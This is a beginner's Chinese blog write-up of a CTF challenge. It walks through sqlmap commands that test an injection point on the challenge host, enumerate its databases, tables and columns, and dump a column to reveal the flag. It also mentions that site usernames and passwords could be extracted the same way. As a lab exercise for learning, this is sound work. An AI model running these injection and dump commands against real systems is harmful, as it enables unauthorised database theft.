SQLMap简单尝试

戏子无情 提交于 2020-03-14 09:43:53

第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的

 

简单介绍注入时后台的数据等级,有助于后面的理解

  ①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库

  

  ②库的下一级是表,相当于一个文件中存在的sheet表

  

  ③表的下级是列

  

  ④每一列中又有字段,可以相当于excel中的一个格格啦

简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦

  1、获得注入点,一般在URL末尾存在参数

  2、爆出所有数据库名称

  3、选定数据库,列出其中的表

  4、列出选定表中的列

  5、列出选定列中的所有字段

  6、爆出相应字段

下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则,这次先隐藏,求轻踩)

网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯

1、检测注入点可用

sqlmap -u http://game.sycsec.com:2007/?sycid=1

  -u :指定注入url

2、暴库

sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs

  --dbs :曝出该sqlserver中所有数据库名称

  结果:好像看到了很有趣的“f1ag”库

  

3、列出数据库中的表

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag --tables

  -D:指定数据库名称(datebase)

  --tables:列出表

  可以看到“f1ag”下只有一个“flag”表

       

4、列出表中的列

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag --columns

  -T:指定表名(table)

  --columns:打印列名

  结果:这里列出了表中的两个列,

  这里有个问题,在图形展示的列的名字是不完整的,而应该去上面箭头位置寻找完整的列名

  

5、爆出此列中的字段

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag -C f4ag --dump

  -C :指定要暴的列

  --dump:把字段展示出来

  结果:就看到我们最喜欢的flag啦!

  

除了这些,还可以爆网站的用户名密码,以后有机会试试咯

参考网站:http://blog.csdn.net/zgyulongfei/article/details/41017493

 


作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!